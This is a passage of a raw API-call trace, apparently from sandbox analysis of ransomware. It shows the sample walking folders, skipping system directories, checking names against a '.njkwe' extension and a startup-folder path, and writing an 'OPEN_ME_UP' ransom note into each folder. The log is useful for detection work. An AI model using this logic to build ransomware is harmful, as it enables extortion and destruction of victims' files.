StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.039] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49316445, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x49316445, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x49316445, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2aff, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0073.039] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0073.039] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0073.039] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0073.039] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0073.039] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0073.039] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95 [0073.039] StrStrIW (lpFirst="tasks.xml", lpSrch=".njkwe") returned 0x0 [0073.039] lstrcmpW (lpString1="tasks.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.039] lstrcmpW (lpString1="tasks.xml", lpString2="taridd") returned 1 [0073.039] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.040] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0073.040] lstrcmpiW (lpString1="wmp.ico", lpString2="Windows") returned 1 [0073.040] lstrcmpiW (lpString1="wmp.ico", lpString2="$Recycle.bin") returned 1 [0073.040] lstrcmpiW (lpString1="wmp.ico", lpString2="System Volume Information") returned 1 [0073.040] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files") returned 1 [0073.040] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files (x86)") returned 1 [0073.040] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 93 [0073.040] StrStrIW (lpFirst="wmp.ico", lpSrch=".njkwe") returned 0x0 [0073.040] lstrcmpW (lpString1="wmp.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.040] lstrcmpW (lpString1="wmp.ico", lpString2="taridd") returned 1 [0073.040] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.040] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.040] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="wmp.ico", cAlternateFileName="")) returned 0 [0073.040] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0073.040] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0073.040] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.041] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.041] CloseHandle (hObject=0x434) returned 1 [0073.042] GetProcessHeap () returned 0xbe0000 [0073.042] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.042] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64a757, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0073.042] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Windows") returned -1 [0073.042] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="$Recycle.bin") returned 1 [0073.042] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="System Volume Information") returned -1 [0073.042] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files") returned -1 [0073.042] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files (x86)") returned -1 [0073.042] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 85 [0073.042] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1 [0073.042] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1 [0073.042] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.042] GetProcessHeap () returned 0xbe0000 [0073.042] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.042] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned 87 [0073.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64a757, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0073.044] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.044] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.044] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.044] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.044] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.044] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\.") returned 87 [0073.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.044] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64a757, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.044] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.044] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.044] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.044] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.044] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.044] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\..") returned 88 [0073.044] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.044] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b2a1d79, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbd64b86a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-US", cAlternateFileName="")) returned 1 [0073.044] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0073.044] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0073.044] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0073.044] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0073.044] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0073.044] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 91 [0073.044] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0073.044] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0073.044] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.044] GetProcessHeap () returned 0xbe0000 [0073.045] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0073.045] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned 93 [0073.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b2a1d79, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbd64b86a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19f20 [0073.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.045] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.045] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.045] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.045] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.045] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\.") returned 93 [0073.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.045] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b2a1d79, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xbd64b86a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.045] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.045] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.045] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\..") returned 94 [0073.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.045] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf64479, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x781a2192, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x549d0900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0073.045] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0073.045] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0073.045] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0073.045] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0073.045] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0073.045] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 104 [0073.045] StrStrIW (lpFirst="resource.xml", lpSrch=".njkwe") returned 0x0 [0073.045] lstrcmpW (lpString1="resource.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.046] lstrcmpW (lpString1="resource.xml", lpString2="taridd") returned -1 [0073.046] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.046] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf64479, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x781a2192, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x549d0900, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0073.046] FindClose (in: hFindFile=0xc19f20 | out: hFindFile=0xc19f20) returned 1 [0073.046] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 123 [0073.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0073.046] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0073.048] CloseHandle (hObject=0x438) returned 1 [0073.048] GetProcessHeap () returned 0xbe0000 [0073.048] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0073.048] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0073.048] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0073.048] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 [0073.048] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0073.048] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0073.048] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0073.048] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 96 [0073.048] StrStrIW (lpFirst="folder.ico", lpSrch=".njkwe") returned 0x0 [0073.048] lstrcmpW (lpString1="folder.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.048] lstrcmpW (lpString1="folder.ico", lpString2="taridd") returned -1 [0073.048] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.048] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.048] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62088d76, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62088d76, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62088d76, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0073.048] lstrcmpiW (lpString1="print_pref.ico", lpString2="Windows") returned -1 [0073.048] lstrcmpiW (lpString1="print_pref.ico", lpString2="$Recycle.bin") returned 1 [0073.048] lstrcmpiW (lpString1="print_pref.ico", lpString2="System Volume Information") returned -1 [0073.048] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files") returned -1 [0073.048] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files (x86)") returned -1 [0073.048] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100 [0073.048] StrStrIW (lpFirst="print_pref.ico", lpSrch=".njkwe") returned 0x0 [0073.048] lstrcmpW (lpString1="print_pref.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.048] lstrcmpW (lpString1="print_pref.ico", lpString2="taridd") returned -1 [0073.048] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.049] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.049] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0073.049] lstrcmpiW (lpString1="print_property.ico", lpString2="Windows") returned -1 [0073.049] lstrcmpiW (lpString1="print_property.ico", lpString2="$Recycle.bin") returned 1 [0073.049] lstrcmpiW (lpString1="print_property.ico", lpString2="System Volume Information") returned -1 [0073.049] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files") returned -1 [0073.049] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files (x86)") returned -1 [0073.049] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 104 [0073.049] StrStrIW (lpFirst="print_property.ico", lpSrch=".njkwe") returned 0x0 [0073.049] lstrcmpW (lpString1="print_property.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.049] lstrcmpW (lpString1="print_property.ico", lpString2="taridd") returned -1 [0073.049] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", 